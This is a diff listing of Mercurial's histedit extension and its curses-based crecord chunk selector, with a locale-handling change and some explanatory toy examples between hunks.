2521 2517 toproceed = set(fullmapping)
2522 2518 final = {}
2523 2519 while toproceed:
2524 2520 for x in list(toproceed):
2525 2521 succs = fullmapping[x]
2526 2522 for s in list(succs):
2527 2523 if s in toproceed:
2528 2524 # non final node with unknown closure
2529 2525 # We can't process this now
2530 2526 break
2531 2527 elif s in final:
2532 2528 # non final node, replace with closure
2533 2529 succs.remove(s)
2534 2530 succs.update(final[s])
2535 2531 else:
2536 2532 final[x] = succs
2537 2533 toproceed.remove(x)
2538 2534 # remove tmpnodes from final mapping
2539 2535 for n in tmpnodes:
2540 2536 del final[n]
2541 2537 # we expect all changes involved in final to exist in the repo
2542 2538 # turn `final` into list (topologically sorted)
2543 2539 get_rev = state.repo.changelog.index.get_rev
2544 2540 for prec, succs in final.items():
2545 2541 final[prec] = sorted(succs, key=get_rev)
2546 2542
2547 2543 # compute the topmost element (necessary for bookmarks)
2548 2544 if new:
2549 2545 newtopmost = sorted(new, key=state.repo.changelog.rev)[-1]
2550 2546 elif not final:
2551 2547 # Nothing rewritten at all. We won't need `newtopmost`:
2552 2548 # it is the same as `oldtopmost` and `processreplacement` knows it.
2553 2549 newtopmost = None
2554 2550 else:
2555 2551 # everybody died. The newtopmost is the parent of the root.
2556 2552 r = state.repo.changelog.rev
2557 2553 newtopmost = state.repo[sorted(final, key=r)[0]].p1().node()
2558 2554
2559 2555 return final, tmpnodes, new, newtopmost
2560 2556
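The reduction loop above repeatedly splices each intermediate successor's own successors into its predecessor's set until only nodes outside the replacement set remain, then drops the temporaries. A toy rerun of that fixpoint on plain strings with invented node names::

    def reduce_replacements(replacements):
        """replacements: list of (old_node, tuple_of_successors) pairs."""
        allsuccs, replaced, fullmapping = set(), set(), {}
        for old, succs in replacements:
            allsuccs.update(succs)
            replaced.add(old)
            fullmapping.setdefault(old, set()).update(succs)
        new = allsuccs - replaced       # created and kept
        tmpnodes = allsuccs & replaced  # created, then rewritten again
        final, toproceed = {}, set(fullmapping)
        while toproceed:
            for x in list(toproceed):
                succs = fullmapping[x]
                for s in list(succs):
                    if s in toproceed:
                        break            # successor not resolved yet
                    elif s in final:
                        succs.remove(s)  # splice in the successor's closure
                        succs.update(final[s])
                else:
                    final[x] = succs
                    toproceed.remove(x)
        for n in tmpnodes:
            del final[n]
        return final, tmpnodes, new

    # 'A' was folded into temporary 'T', which was then amended into 'B':
    print(reduce_replacements([('A', ('T',)), ('T', ('B',))]))
    # -> ({'A': {'B'}}, {'T'}, {'B'})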
2561 2557
2562 2558 def movetopmostbookmarks(repo, oldtopmost, newtopmost):
2563 2559 """Move bookmark from oldtopmost to newly created topmost
2564 2560
2565 2561 This is arguably a feature and we may only want that for the active
2566 2562 bookmark. But the behavior is kept compatible with the old version for now.
2567 2563 """
2568 2564 if not oldtopmost or not newtopmost:
2569 2565 return
2570 2566 oldbmarks = repo.nodebookmarks(oldtopmost)
2571 2567 if oldbmarks:
2572 2568 with repo.lock(), repo.transaction(b'histedit') as tr:
2573 2569 marks = repo._bookmarks
2574 2570 changes = []
2575 2571 for name in oldbmarks:
2576 2572 changes.append((name, newtopmost))
2577 2573 marks.applychanges(repo, tr, changes)
2578 2574
2579 2575
2580 2576 def cleanupnode(ui, repo, nodes, nobackup=False):
2581 2577 """strip a group of nodes from the repository
2582 2578
2583 2579 The set of nodes to strip may contain unknown nodes."""
2584 2580 with repo.lock():
2585 2581 # do not let filtering get in the way of the cleanse
2586 2582 # we should probably get rid of obsolescence markers created during the
2587 2583 # histedit, but we currently do not have such information.
2588 2584 repo = repo.unfiltered()
2589 2585 # Find all nodes that need to be stripped
2590 2586 # (we use %lr instead of %ln to silently ignore unknown items)
2591 2587 has_node = repo.changelog.index.has_node
2592 2588 nodes = sorted(n for n in nodes if has_node(n))
2593 2589 roots = [c.node() for c in repo.set(b"roots(%ln)", nodes)]
2594 2590 if roots:
2595 2591 backup = not nobackup
2596 2592 repair.strip(ui, repo, roots, backup=backup)
2597 2593
2598 2594
2599 2595 def stripwrapper(orig, ui, repo, nodelist, *args, **kwargs):
2600 2596 if isinstance(nodelist, bytes):
2601 2597 nodelist = [nodelist]
2602 2598 state = histeditstate(repo)
2603 2599 if state.inprogress():
2604 2600 state.read()
2605 2601 histedit_nodes = {
2606 2602 action.node for action in state.actions if action.node
2607 2603 }
2608 2604 common_nodes = histedit_nodes & set(nodelist)
2609 2605 if common_nodes:
2610 2606 raise error.Abort(
2611 2607 _(b"histedit in progress, can't strip %s")
2612 2608 % b', '.join(node.short(x) for x in common_nodes)
2613 2609 )
2614 2610 return orig(ui, repo, nodelist, *args, **kwargs)
2615 2611
2616 2612
2617 2613 extensions.wrapfunction(repair, b'strip', stripwrapper)
2618 2614
2619 2615
2620 2616 def summaryhook(ui, repo):
2621 2617 state = histeditstate(repo)
2622 2618 if not state.inprogress():
2623 2619 return
2624 2620 state.read()
2625 2621 if state.actions:
2626 2622 # i18n: column positioning for "hg summary"
2627 2623 ui.write(
2628 2624 _(b'hist: %s (histedit --continue)\n')
2629 2625 % (
2630 2626 ui.label(_(b'%d remaining'), b'histedit.remaining')
2631 2627 % len(state.actions)
2632 2628 )
2633 2629 )
2634 2630
2635 2631
2636 2632 def extsetup(ui):
2637 2633 cmdutil.summaryhooks.add(b'histedit', summaryhook)
2638 2634 statemod.addunfinished(
2639 2635 b'histedit',
2640 2636 fname=b'histedit-state',
2641 2637 allowcommit=True,
2642 2638 continueflag=True,
2643 2639 abortfunc=hgaborthistedit,
2644 2640 )
@@ -1,2037 +1,2034 b''
1 1 # stuff related specifically to patch manipulation / parsing
2 2 #
3 3 # Copyright 2008 Mark Edgington <edgimar@gmail.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7 #
8 8 # This code is based on Mark Edgington's crecord extension.
9 9 # (Itself based on Bryan O'Sullivan's record extension.)
10 10
11 11 from __future__ import absolute_import
12 12
13 import locale
14 13 import os
15 14 import re
16 15 import signal
17 16
18 17 from .i18n import _
19 18 from .pycompat import (
20 19 getattr,
21 20 open,
22 21 )
23 22 from . import (
24 23 encoding,
25 24 error,
26 25 patch as patchmod,
27 26 pycompat,
28 27 scmutil,
29 28 util,
30 29 )
31 30 from .utils import stringutil
32 31
33 32 stringio = util.stringio
34 33
35 34 # patch comments based on the git one
36 35 diffhelptext = _(
37 36 """# To remove '-' lines, make them ' ' lines (context).
38 37 # To remove '+' lines, delete them.
39 38 # Lines starting with # will be removed from the patch.
40 39 """
41 40 )
42 41
43 42 hunkhelptext = _(
44 43 """#
45 44 # If the patch applies cleanly, the edited hunk will immediately be
46 45 # added to the record list. If it does not apply cleanly, a rejects file
47 46 # will be generated. You can use that when you try again. If all lines
48 47 # of the hunk are removed, then the edit is aborted and the hunk is left
49 48 # unchanged.
50 49 """
51 50 )
52 51
53 52 patchhelptext = _(
54 53 """#
55 54 # If the patch applies cleanly, the edited patch will immediately
56 55 # be finalised. If it does not apply cleanly, rejects files will be
57 56 # generated. You can use those when you try again.
58 57 """
59 58 )
60 59
61 60 try:
62 61 import curses
63 62 import curses.ascii
64 63
65 64 curses.error
66 65 except (ImportError, AttributeError):
67 66 # I have no idea if wcurses works with crecord...
68 67 try:
69 68 import wcurses as curses
70 69
71 70 curses.error
72 71 except (ImportError, AttributeError):
73 72 # wcurses is not shipped on Windows by default, or python is not
74 73 # compiled with curses
75 74 curses = False
76 75
77 76
78 77 class fallbackerror(error.Abort):
79 78 """Error that indicates the client should try to fallback to text mode."""
80 79
81 80 # Inherits from error.Abort so that existing behavior is preserved if the
82 81 # calling code does not know how to fallback.
83 82
84 83
85 84 def checkcurses(ui):
86 85 """Return True if the user wants to use curses
87 86
88 87 This method returns True if curses is found (and that python is built with
89 88 it) and that the user has the correct flag for the ui.
90 89 """
91 90 return curses and ui.interface(b"chunkselector") == b"curses"
92 91
93 92
94 93 class patchnode(object):
95 94 """abstract class for patch graph nodes
96 95 (i.e. patchroot, header, hunk, hunkline)
97 96 """
98 97
99 98 def firstchild(self):
100 99 raise NotImplementedError(b"method must be implemented by subclass")
101 100
102 101 def lastchild(self):
103 102 raise NotImplementedError(b"method must be implemented by subclass")
104 103
105 104 def allchildren(self):
106 105 """Return a list of all of the direct children of this node"""
107 106 raise NotImplementedError(b"method must be implemented by subclass")
108 107
109 108 def nextsibling(self):
110 109 """
111 110 Return the closest next item of the same type where there are no items
112 111 of different types between the current item and this closest item.
113 112 If no such item exists, return None.
114 113 """
115 114 raise NotImplementedError(b"method must be implemented by subclass")
116 115
117 116 def prevsibling(self):
118 117 """
119 118 Return the closest previous item of the same type where there are no
120 119 items of different types between the current item and this closest item.
121 120 If no such item exists, return None.
122 121 """
123 122 raise NotImplementedError(b"method must be implemented by subclass")
124 123
125 124 def parentitem(self):
126 125 raise NotImplementedError(b"method must be implemented by subclass")
127 126
128 127 def nextitem(self, skipfolded=True):
129 128 """
130 129 Try to return the next item closest to this item, regardless of item's
131 130 type (header, hunk, or hunkline).
132 131
133 132 If skipfolded == True, and the current item is folded, then the child
134 133 items that are hidden due to folding will be skipped when determining
135 134 the next item.
136 135
137 136 If it is not possible to get the next item, return None.
138 137 """
139 138 try:
140 139 itemfolded = self.folded
141 140 except AttributeError:
142 141 itemfolded = False
143 142 if skipfolded and itemfolded:
144 143 nextitem = self.nextsibling()
145 144 if nextitem is None:
146 145 try:
147 146 nextitem = self.parentitem().nextsibling()
148 147 except AttributeError:
149 148 nextitem = None
150 149 return nextitem
151 150 else:
152 151 # try child
153 152 item = self.firstchild()
154 153 if item is not None:
155 154 return item
156 155
157 156 # else try next sibling
158 157 item = self.nextsibling()
159 158 if item is not None:
160 159 return item
161 160
162 161 try:
163 162 # else try parent's next sibling
164 163 item = self.parentitem().nextsibling()
165 164 if item is not None:
166 165 return item
167 166
168 167 # else return grandparent's next sibling (or None)
169 168 return self.parentitem().parentitem().nextsibling()
170 169
171 170 except AttributeError: # parent and/or grandparent was None
172 171 return None
173 172
174 173 def previtem(self):
175 174 """
176 175 Try to return the previous item closest to this item, regardless of
177 176 item's type (header, hunk, or hunkline).
178 177
179 178 If it is not possible to get the previous item, return None.
180 179 """
181 180 # try previous sibling's last child's last child,
182 181 # else try previous sibling's last child, else try previous sibling
183 182 prevsibling = self.prevsibling()
184 183 if prevsibling is not None:
185 184 prevsiblinglastchild = prevsibling.lastchild()
186 185 if (prevsiblinglastchild is not None) and not prevsibling.folded:
187 186 prevsiblinglclc = prevsiblinglastchild.lastchild()
188 187 if (
189 188 prevsiblinglclc is not None
190 189 ) and not prevsiblinglastchild.folded:
191 190 return prevsiblinglclc
192 191 else:
193 192 return prevsiblinglastchild
194 193 else:
195 194 return prevsibling
196 195
197 196 # try parent (or None)
198 197 return self.parentitem()
199 198
200 199
201 200 class patch(patchnode, list): # todo: rename patchroot
202 201 """
203 202 list of header objects representing the patch.
204 203 """
205 204
206 205 def __init__(self, headerlist):
207 206 self.extend(headerlist)
208 207 # add parent patch object reference to each header
209 208 for header in self:
210 209 header.patch = self
211 210
212 211
213 212 class uiheader(patchnode):
214 213 """patch header
215 214
216 215 xxx shouldn't we move this to mercurial/patch.py ?
217 216 """
218 217
219 218 def __init__(self, header):
220 219 self.nonuiheader = header
221 220 # flag to indicate whether to apply this chunk
222 221 self.applied = True
223 222 # flag which only affects the status display indicating if a node's
224 223 # children are partially applied (i.e. some applied, some not).
225 224 self.partial = False
226 225
227 226 # flag to indicate whether to display as folded/unfolded to user
228 227 self.folded = True
229 228
230 229 # list of all headers in patch
231 230 self.patch = None
232 231
233 232 # flag is False if this header was ever unfolded from initial state
234 233 self.neverunfolded = True
235 234 self.hunks = [uihunk(h, self) for h in self.hunks]
236 235
237 236 def prettystr(self):
238 237 x = stringio()
239 238 self.pretty(x)
240 239 return x.getvalue()
241 240
242 241 def nextsibling(self):
243 242 numheadersinpatch = len(self.patch)
244 243 indexofthisheader = self.patch.index(self)
245 244
246 245 if indexofthisheader < numheadersinpatch - 1:
247 246 nextheader = self.patch[indexofthisheader + 1]
248 247 return nextheader
249 248 else:
250 249 return None
251 250
252 251 def prevsibling(self):
253 252 indexofthisheader = self.patch.index(self)
254 253 if indexofthisheader > 0:
255 254 previousheader = self.patch[indexofthisheader - 1]
256 255 return previousheader
257 256 else:
258 257 return None
259 258
260 259 def parentitem(self):
261 260 """
262 261 there is no 'real' parent item of a header that can be selected,
263 262 so return None.
264 263 """
265 264 return None
266 265
267 266 def firstchild(self):
268 267 """return the first child of this item, if one exists. otherwise
269 268 None."""
270 269 if len(self.hunks) > 0:
271 270 return self.hunks[0]
272 271 else:
273 272 return None
274 273
275 274 def lastchild(self):
276 275 """return the last child of this item, if one exists. otherwise
277 276 None."""
278 277 if len(self.hunks) > 0:
279 278 return self.hunks[-1]
280 279 else:
281 280 return None
282 281
283 282 def allchildren(self):
284 283 """return a list of all of the direct children of this node"""
285 284 return self.hunks
286 285
287 286 def __getattr__(self, name):
288 287 return getattr(self.nonuiheader, name)
289 288
290 289
291 290 class uihunkline(patchnode):
292 291 """represents a changed line in a hunk"""
293 292
294 293 def __init__(self, linetext, hunk):
295 294 self.linetext = linetext
296 295 self.applied = True
297 296 # the parent hunk to which this line belongs
298 297 self.hunk = hunk
299 298 # folding lines is currently not used/needed, but this flag is needed
300 299 # in the previtem method.
301 300 self.folded = False
302 301
303 302 def prettystr(self):
304 303 return self.linetext
305 304
306 305 def nextsibling(self):
307 306 numlinesinhunk = len(self.hunk.changedlines)
308 307 indexofthisline = self.hunk.changedlines.index(self)
309 308
310 309 if indexofthisline < numlinesinhunk - 1:
311 310 nextline = self.hunk.changedlines[indexofthisline + 1]
312 311 return nextline
313 312 else:
314 313 return None
315 314
316 315 def prevsibling(self):
317 316 indexofthisline = self.hunk.changedlines.index(self)
318 317 if indexofthisline > 0:
319 318 previousline = self.hunk.changedlines[indexofthisline - 1]
320 319 return previousline
321 320 else:
322 321 return None
323 322
324 323 def parentitem(self):
325 324 """return the parent to the current item"""
326 325 return self.hunk
327 326
328 327 def firstchild(self):
329 328 """return the first child of this item, if one exists. otherwise
330 329 None."""
331 330 # hunk-lines don't have children
332 331 return None
333 332
334 333 def lastchild(self):
335 334 """return the last child of this item, if one exists. otherwise
336 335 None."""
337 336 # hunk-lines don't have children
338 337 return None
339 338
340 339
341 340 class uihunk(patchnode):
342 341 """ui patch hunk, wraps a hunk and keep track of ui behavior """
343 342
344 343 maxcontext = 3
345 344
346 345 def __init__(self, hunk, header):
347 346 self._hunk = hunk
348 347 self.changedlines = [uihunkline(line, self) for line in hunk.hunk]
349 348 self.header = header
350 349 # used at end for detecting how many removed lines were un-applied
351 350 self.originalremoved = self.removed
352 351
353 352 # flag to indicate whether to display as folded/unfolded to user
354 353 self.folded = True
355 354 # flag to indicate whether to apply this chunk
356 355 self.applied = True
357 356 # flag which only affects the status display indicating if a node's
358 357 # children are partially applied (i.e. some applied, some not).
359 358 self.partial = False
360 359
361 360 def nextsibling(self):
362 361 numhunksinheader = len(self.header.hunks)
363 362 indexofthishunk = self.header.hunks.index(self)
364 363
365 364 if indexofthishunk < numhunksinheader - 1:
366 365 nexthunk = self.header.hunks[indexofthishunk + 1]
367 366 return nexthunk
368 367 else:
369 368 return None
370 369
371 370 def prevsibling(self):
372 371 indexofthishunk = self.header.hunks.index(self)
373 372 if indexofthishunk > 0:
374 373 previoushunk = self.header.hunks[indexofthishunk - 1]
375 374 return previoushunk
376 375 else:
377 376 return None
378 377
379 378 def parentitem(self):
380 379 """return the parent to the current item"""
381 380 return self.header
382 381
383 382 def firstchild(self):
384 383 """return the first child of this item, if one exists. otherwise
385 384 None."""
386 385 if len(self.changedlines) > 0:
387 386 return self.changedlines[0]
388 387 else:
389 388 return None
390 389
391 390 def lastchild(self):
392 391 """return the last child of this item, if one exists. otherwise
393 392 None."""
394 393 if len(self.changedlines) > 0:
395 394 return self.changedlines[-1]
396 395 else:
397 396 return None
398 397
399 398 def allchildren(self):
400 399 """return a list of all of the direct children of this node"""
401 400 return self.changedlines
402 401
403 402 def countchanges(self):
404 403 """changedlines -> (n+,n-)"""
405 404 add = len(
406 405 [
407 406 l
408 407 for l in self.changedlines
409 408 if l.applied and l.prettystr().startswith(b'+')
410 409 ]
411 410 )
412 411 rem = len(
413 412 [
414 413 l
415 414 for l in self.changedlines
416 415 if l.applied and l.prettystr().startswith(b'-')
417 416 ]
418 417 )
419 418 return add, rem
420 419
421 420 def getfromtoline(self):
422 421 # calculate the number of removed lines converted to context lines
423 422 removedconvertedtocontext = self.originalremoved - self.removed
424 423
425 424 contextlen = (
426 425 len(self.before) + len(self.after) + removedconvertedtocontext
427 426 )
428 427 if self.after and self.after[-1] == b'\\ No newline at end of file\n':
429 428 contextlen -= 1
430 429 fromlen = contextlen + self.removed
431 430 tolen = contextlen + self.added
432 431
433 432 # diffutils manual, section "2.2.2.2 detailed description of unified
434 433 # format": "an empty hunk is considered to end at the line that
435 434 # precedes the hunk."
436 435 #
437 436 # so, if either of hunks is empty, decrease its line start. --immerrr
438 437 # but only do this if fromline > 0, to avoid having, e.g fromline=-1.
439 438 fromline, toline = self.fromline, self.toline
440 439 if fromline != 0:
441 440 if fromlen == 0:
442 441 fromline -= 1
443 442 if tolen == 0 and toline > 0:
444 443 toline -= 1
445 444
446 445 fromtoline = b'@@ -%d,%d +%d,%d @@%s\n' % (
447 446 fromline,
448 447 fromlen,
449 448 toline,
450 449 tolen,
451 450 self.proc and (b' ' + self.proc),
452 451 )
453 452 return fromtoline
454 453
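getfromtoline rebuilds the '@@ -from,len +to,len @@' header after lines have been toggled: each unapplied removal becomes extra context, and a side that ends up empty has its start line moved back by one, per the diffutils rule quoted above. A small standalone recomputation with invented counts::

    def fromtoline(fromline, toline, context, removed, added, proc=b''):
        """Build a unified-diff hunk header from the given counts."""
        fromlen = context + removed
        tolen = context + added
        # An empty hunk side "ends at the line that precedes the hunk",
        # so its start line is decremented (never below zero).
        if fromline != 0:
            if fromlen == 0:
                fromline -= 1
            if tolen == 0 and toline > 0:
                toline -= 1
        return b'@@ -%d,%d +%d,%d @@%s\n' % (
            fromline, fromlen, toline, tolen, proc and (b' ' + proc))

    # A pure-deletion hunk: no context, two removals kept, no additions.
    print(fromtoline(fromline=10, toline=10, context=0, removed=2, added=0))
    # -> b'@@ -10,2 +9,0 @@\n'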
455 454 def write(self, fp):
456 455 # update self.added/removed, which are used by getfromtoline()
457 456 self.added, self.removed = self.countchanges()
458 457 fp.write(self.getfromtoline())
459 458
460 459 hunklinelist = []
461 460 # add the following to the list: (1) all applied lines, and
462 461 # (2) all unapplied removal lines (convert these to context lines)
463 462 for changedline in self.changedlines:
464 463 changedlinestr = changedline.prettystr()
465 464 if changedline.applied:
466 465 hunklinelist.append(changedlinestr)
467 466 elif changedlinestr.startswith(b"-"):
468 467 hunklinelist.append(b" " + changedlinestr[1:])
469 468
470 469 fp.write(b''.join(self.before + hunklinelist + self.after))
471 470
472 471 pretty = write
473 472
474 473 def prettystr(self):
475 474 x = stringio()
476 475 self.pretty(x)
477 476 return x.getvalue()
478 477
479 478 def reversehunk(self):
480 479 """return a recordhunk which is the reverse of the hunk
481 480
482 481 Assuming the displayed patch is the diff(A, B) result. The returned hunk is
483 482 intended to be applied to B, instead of A.
484 483
485 484 For example, when A is "0\n1\n2\n6\n" and B is "0\n3\n4\n5\n6\n", and
486 485 the user made the following selection:
487 486
488 487 0
489 488 [x] -1 [x]: selected
490 489 [ ] -2 [ ]: not selected
491 490 [x] +3
492 491 [ ] +4
493 492 [x] +5
494 493 6
495 494
496 495 This function returns a hunk like:
497 496
498 497 0
499 498 -3
500 499 -4
501 500 -5
502 501 +1
503 502 +4
504 503 6
505 504
506 505 Note "4" was first deleted then added. That's because "4" exists in B
507 506 side and "-4" must exist between "-3" and "-5" to make the patch
508 507 applicable to B.
509 508 """
510 509 dels = []
511 510 adds = []
512 511 for line in self.changedlines:
513 512 text = line.linetext
514 513 if line.applied:
515 514 if text.startswith(b'+'):
516 515 dels.append(text[1:])
517 516 elif text.startswith(b'-'):
518 517 adds.append(text[1:])
519 518 elif text.startswith(b'+'):
520 519 dels.append(text[1:])
521 520 adds.append(text[1:])
522 521 hunk = [b'-%s' % l for l in dels] + [b'+%s' % l for l in adds]
523 522 h = self._hunk
524 523 return patchmod.recordhunk(
525 524 h.header, h.toline, h.fromline, h.proc, h.before, hunk, h.after
526 525 )
527 526
528 527 def __getattr__(self, name):
529 528 return getattr(self._hunk, name)
530 529
531 530 def __repr__(self):
532 531 return '<hunk %r@%d>' % (self.filename(), self.fromline)
533 532
534 533
535 534 def filterpatch(ui, chunks, chunkselector, operation=None):
536 535 """interactively filter patch chunks into applied-only chunks"""
537 536 chunks = list(chunks)
538 537 # convert chunks list into structure suitable for displaying/modifying
539 538 # with curses. create a list of headers only.
540 539 headers = [c for c in chunks if isinstance(c, patchmod.header)]
541 540
542 541 # if there are no changed files
543 542 if len(headers) == 0:
544 543 return [], {}
545 544 uiheaders = [uiheader(h) for h in headers]
546 545 # let user choose headers/hunks/lines, and mark their applied flags
547 546 # accordingly
548 547 ret = chunkselector(ui, uiheaders, operation=operation)
549 548 appliedhunklist = []
550 549 for hdr in uiheaders:
551 550 if hdr.applied and (
552 551 hdr.special() or len([h for h in hdr.hunks if h.applied]) > 0
553 552 ):
554 553 appliedhunklist.append(hdr)
555 554 fixoffset = 0
556 555 for hnk in hdr.hunks:
557 556 if hnk.applied:
558 557 appliedhunklist.append(hnk)
559 558 # adjust the 'to'-line offset of the hunk to be correct
560 559 # after de-activating some of the other hunks for this file
561 560 if fixoffset:
562 561 # hnk = copy.copy(hnk) # necessary??
563 562 hnk.toline += fixoffset
564 563 else:
565 564 fixoffset += hnk.removed - hnk.added
566 565
567 566 return (appliedhunklist, ret)
568 567
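When a hunk is left out, every later hunk of the same file lands (removed - added) lines away from where the full patch would have put it, which is exactly what the running fixoffset above compensates for. A worked toy illustration with invented hunk sizes::

    def adjust_tolines(hunks):
        """hunks: dicts with 'applied', 'added', 'removed' and 'toline'.
        Return the corrected 'to' line of each applied hunk."""
        fixoffset = 0
        out = []
        for h in hunks:
            if h['applied']:
                out.append(h['toline'] + fixoffset)
            else:
                # The skipped hunk leaves the file unchanged here, so later
                # hunks shift by the lines it would have added or removed.
                fixoffset += h['removed'] - h['added']
        return out

    hunks = [
        {'applied': True,  'added': 2, 'removed': 0, 'toline': 5},
        {'applied': False, 'added': 3, 'removed': 1, 'toline': 20},  # dropped
        {'applied': True,  'added': 1, 'removed': 1, 'toline': 40},
    ]
    print(adjust_tolines(hunks))  # [5, 38]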
569 568
570 569 def chunkselector(ui, headerlist, operation=None):
571 570 """
572 571 curses interface to get selection of chunks, and mark the applied flags
573 572 of the chosen chunks.
574 573 """
575 574 ui.write(_(b'starting interactive selection\n'))
576 575 chunkselector = curseschunkselector(headerlist, ui, operation)
577 # This is required for ncurses to display non-ASCII characters in
578 # default user locale encoding correctly. --immerrr
579 locale.setlocale(locale.LC_ALL, '')
580 576 origsigtstp = sentinel = object()
581 577 if util.safehasattr(signal, b'SIGTSTP'):
582 578 origsigtstp = signal.getsignal(signal.SIGTSTP)
583 579 try:
584 curses.wrapper(chunkselector.main)
580 with util.with_lc_ctype():
581 curses.wrapper(chunkselector.main)
585 582 if chunkselector.initexc is not None:
586 583 raise chunkselector.initexc
587 584 # ncurses does not restore signal handler for SIGTSTP
588 585 finally:
589 586 if origsigtstp is not sentinel:
590 587 signal.signal(signal.SIGTSTP, origsigtstp)
591 588 return chunkselector.opts
592 589
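Both curses entry points lean on curses.wrapper, which initializes the screen, runs the callable, and restores the terminal even if the callable raises; only the SIGTSTP handler has to be saved and restored by hand, as done above. A tiny sketch of that guarantee, with a deliberately failing main::

    import curses

    def main(stdscr):
        stdscr.addstr(0, 0, 'about to fail')
        stdscr.refresh()
        raise RuntimeError('boom')

    try:
        # wrapper() sets up curses, calls main(stdscr), and always calls
        # endwin() on the way out, so the terminal is usable afterwards
        # even though main() raised.
        curses.wrapper(main)
    except RuntimeError as exc:
        print('terminal restored, caught:', exc)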
593 590
594 591 def testdecorator(testfn, f):
595 592 def u(*args, **kwargs):
596 593 return f(testfn, *args, **kwargs)
597 594
598 595 return u
599 596
600 597
601 598 def testchunkselector(testfn, ui, headerlist, operation=None):
602 599 """
603 600 test interface to get selection of chunks, and mark the applied flags
604 601 of the chosen chunks.
605 602 """
606 603 chunkselector = curseschunkselector(headerlist, ui, operation)
607 604
608 605 class dummystdscr(object):
609 606 def clear(self):
610 607 pass
611 608
612 609 def refresh(self):
613 610 pass
614 611
615 612 chunkselector.stdscr = dummystdscr()
616 613 if testfn and os.path.exists(testfn):
617 614 testf = open(testfn, 'r')
618 615 testcommands = [x.rstrip('\n') for x in testf.readlines()]
619 616 testf.close()
620 617 while True:
621 618 if chunkselector.handlekeypressed(testcommands.pop(0), test=True):
622 619 break
623 620 return chunkselector.opts
624 621
625 622
626 623 _headermessages = { # {operation: text}
627 624 b'apply': _(b'Select hunks to apply'),
628 625 b'discard': _(b'Select hunks to discard'),
629 626 b'keep': _(b'Select hunks to keep'),
630 627 None: _(b'Select hunks to record'),
631 628 }
632 629
633 630
634 631 class curseschunkselector(object):
635 632 def __init__(self, headerlist, ui, operation=None):
636 633 # put the headers into a patch object
637 634 self.headerlist = patch(headerlist)
638 635
639 636 self.ui = ui
640 637 self.opts = {}
641 638
642 639 self.errorstr = None
643 640 # list of all chunks
644 641 self.chunklist = []
645 642 for h in headerlist:
646 643 self.chunklist.append(h)
647 644 self.chunklist.extend(h.hunks)
648 645
649 646 # dictionary mapping (fgcolor, bgcolor) pairs to the
650 647 # corresponding curses color-pair value.
651 648 self.colorpairs = {}
652 649 # maps custom nicknames of color-pairs to curses color-pair values
653 650 self.colorpairnames = {}
654 651
655 652 # Honor color setting of ui section. Keep colored setup as
656 653 # long as not explicitly set to a falsy value - especially,
657 654 # when not set at all. This is to stay most compatible with
658 655 # previous (color only) behaviour.
659 656 uicolor = stringutil.parsebool(self.ui.config(b'ui', b'color'))
660 657 self.usecolor = uicolor is not False
661 658
662 659 # the currently selected header, hunk, or hunk-line
663 660 self.currentselecteditem = self.headerlist[0]
664 661 self.lastapplieditem = None
665 662
666 663 # updated when printing out patch-display -- the 'lines' here are the
667 664 # line positions *in the pad*, not on the screen.
668 665 self.selecteditemstartline = 0
669 666 self.selecteditemendline = None
670 667
671 668 # define indentation levels
672 669 self.headerindentnumchars = 0
673 670 self.hunkindentnumchars = 3
674 671 self.hunklineindentnumchars = 6
675 672
676 673 # the first line of the pad to print to the screen
677 674 self.firstlineofpadtoprint = 0
678 675
679 676 # keeps track of the number of lines in the pad
680 677 self.numpadlines = None
681 678
682 679 self.numstatuslines = 1
683 680
684 681 # keep a running count of the number of lines printed to the pad
685 682 # (used for determining when the selected item begins/ends)
686 683 self.linesprintedtopadsofar = 0
687 684
688 685 # stores optional text for a commit comment provided by the user
689 686 self.commenttext = b""
690 687
691 688 # if the last 'toggle all' command caused all changes to be applied
692 689 self.waslasttoggleallapplied = True
693 690
694 691 # affects some ui text
695 692 if operation not in _headermessages:
696 693 raise error.ProgrammingError(
697 694 b'unexpected operation: %s' % operation
698 695 )
699 696 self.operation = operation
700 697
701 698 def uparrowevent(self):
702 699 """
703 700 try to select the most-indented item just before the current item.
704 701 for example, if a hunk is selected, try to select
705 702 the last hunkline of the hunk prior to the selected hunk. or, if
706 703 the first hunkline of a hunk is currently selected, then select the
707 704 hunk itself.
708 705 """
709 706 currentitem = self.currentselecteditem
710 707
711 708 nextitem = currentitem.previtem()
712 709
713 710 if nextitem is None:
714 711 # if no parent item (i.e. currentitem is the first header), then
715 712 # no change...
716 713 nextitem = currentitem
717 714
718 715 self.currentselecteditem = nextitem
719 716
720 717 def uparrowshiftevent(self):
721 718 """
722 719 select (if possible) the previous item on the same level as the
723 720 currently selected item. otherwise, select (if possible) the
724 721 parent-item of the currently selected item.
725 722 """
726 723 currentitem = self.currentselecteditem
727 724 nextitem = currentitem.prevsibling()
728 725 # if there's no previous sibling, try choosing the parent
729 726 if nextitem is None:
730 727 nextitem = currentitem.parentitem()
731 728 if nextitem is None:
732 729 # if no parent item (i.e. currentitem is the first header), then
733 730 # no change...
734 731 nextitem = currentitem
735 732
736 733 self.currentselecteditem = nextitem
737 734 self.recenterdisplayedarea()
738 735
739 736 def downarrowevent(self):
740 737 """
741 738 try to select the most-indented item just after the current item.
742 739 for example, if a hunk is selected, select
743 740 the first hunkline of the selected hunk. or, if the last hunkline of
744 741 a hunk is currently selected, then select the next hunk, if one exists,
745 742 or if not, the next header if one exists.
746 743 """
747 744 # self.startprintline += 1 #debug
748 745 currentitem = self.currentselecteditem
749 746
750 747 nextitem = currentitem.nextitem()
751 748 # if there's no next item, keep the selection as-is
752 749 if nextitem is None:
753 750 nextitem = currentitem
754 751
755 752 self.currentselecteditem = nextitem
756 753
757 754 def downarrowshiftevent(self):
758 755 """
759 756 select (if possible) the next item on the same level as the currently
760 757 selected item. otherwise, select (if possible) the next item on the
761 758 same level as the parent item of the currently selected item.
762 759 """
763 760 currentitem = self.currentselecteditem
764 761 nextitem = currentitem.nextsibling()
765 762 # if there's no next sibling, try choosing the parent's nextsibling
766 763 if nextitem is None:
767 764 try:
768 765 nextitem = currentitem.parentitem().nextsibling()
769 766 except AttributeError:
770 767 # parentitem returned None, so nextsibling() can't be called
771 768 nextitem = None
772 769 if nextitem is None:
773 770 # if parent has no next sibling, then no change...
774 771 nextitem = currentitem
775 772
776 773 self.currentselecteditem = nextitem
777 774 self.recenterdisplayedarea()
778 775
779 776 def nextsametype(self, test=False):
780 777 currentitem = self.currentselecteditem
781 778 sametype = lambda item: isinstance(item, type(currentitem))
782 779 nextitem = currentitem.nextitem()
783 780
